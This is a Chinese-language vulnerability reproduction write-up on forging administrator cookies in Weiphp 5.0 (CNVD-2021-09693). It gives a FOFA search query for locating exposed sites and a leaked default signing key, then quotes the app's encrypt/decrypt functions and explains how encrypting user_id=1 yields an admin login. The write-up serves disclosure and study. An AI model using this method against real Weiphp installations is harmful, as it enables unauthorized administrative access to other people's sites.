# Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693 ### 漏洞描述 Weiphp5.0 存在管理员用户Cookie伪造,通过泄露的密钥数据,可利用加密方法来得到管理员的Cookie ### 影响版本 Note Weiphp <= 5.0 ### 环境搭建 [weiphp5.0官方下载参考手册](https://www.weiphp.cn/doc/Initialization_database.html) 参考官方手册创建网站即可 ![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpvPZqPh3zpTdBCKyM%2Fimage.png?alt=media\&token=27d83e60-cd93-428d-b10a-86757e5d79e6) ### FOFA app="WeiPHP" ### 漏洞复现 首先需要得到数据库配置文件中的**data\_auth\_key**密钥 ![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpvU3pOUhk5xoc105n%2Fimage.png?alt=media\&token=fbe96ede-d3cf-4bb9-83f8-5517f48d7438) 得到这个配置文件可参照上一篇**Weiphp5.0 前台文件任意读取** ``` 'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T' ``` 全局查找下使用了这个密钥的地方 ![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpvuq09dfWJ5W8cqms%2Fimage.png?alt=media\&token=82c7ac22-a816-4b4c-b084-ee5bdb13ba53) 找到了跟据这个密钥的加密方法和解密方法 **加密方法 think\_encrypt** ``` function think_encrypt($data, $key = '', $expire = 0) { $key = md5(empty($key) ? config('database.data_auth_key') : $key); $data = base64_encode($data); $x = 0; $len = strlen($data); $l = strlen($key); $char = ''; for ($i = 0; $i < $len; $i++) { if ($x == $l) { $x = 0; } $char .= substr($key, $x, 1); $x++; } $str = sprintf('%010d', $expire ? $expire + time() : 0); for ($i = 0; $i < $len; $i++) { $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256); } return str_replace(array( '+', '/', '=' ), array( '-', '_', '' ), base64_encode($str)); } ``` **解密方法 think\_decrypt** ``` function think_decrypt($data, $key = '') { $key = md5(empty($key) ? config('database.data_auth_key') : $key); $data = str_replace(array( '-', '_' ), array( '+', '/' ), $data); $mod4 = strlen($data) % 4; if ($mod4) { $data .= substr('====', $mod4); } $data = base64_decode($data); $expire = substr($data, 0, 10); $data = substr($data, 10); if ($expire > 0 && $expire < time()) { return ''; } $x = 0; $len = strlen($data); $l = strlen($key); $char = $str = ''; for ($i = 0; $i < $len; $i++) { if ($x == $l) { $x = 0; } $char .= substr($key, $x, 1); $x++; } for ($i = 0; $i < $len; $i++) { if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) { $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1))); } else { $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1))); } } return base64_decode($str); } ``` 全局查看下使用了解密方法的地方 在文件 **application\common.php** 中含有使用解密方法的代码,用于做身份验证 ``` function is_login() { $user = session('user_auth'); if (empty($user)) { $cookie_uid = cookie('user_id'); if (!empty($cookie_uid)) { $uid = think_decrypt($cookie_uid); $userinfo = getUserInfo($uid); D('common/User')->autoLogin($userinfo); $user = session('user_auth'); } } if (empty($user)) { return 0; } else { return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0; } } ``` 根据这里得到的代码,可以知道当**user\_Id=1**时,会解密密钥后判断是否正确,如果正确则可以登录系统 我们在本地使用加密代码加密**user\_id=1**得到的cookie则可以登录系统 ``` ``` ![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpw2c5wDK5i7q7-WtQ%2Fimage.png?alt=media\&token=46edb83b-e8bd-4357-9c2a-55234f8418f0) 添加**cookie: user\_id=xxxxxxxx**即可成功登录
![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-Mhpw89cW-fqWhEjj34b%2Fimage.png?alt=media\&token=57354ff0-a0fe-482e-a2b6-311ebc0981cd) ![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhpt_4qJND-iASkek6k%2F-MhpwAV3_PM__caepFI6%2Fimage.png?alt=media\&token=48d4d855-3690-47f7-a23b-1b99008c2c69) 获取密钥的方法参照上一篇审计文章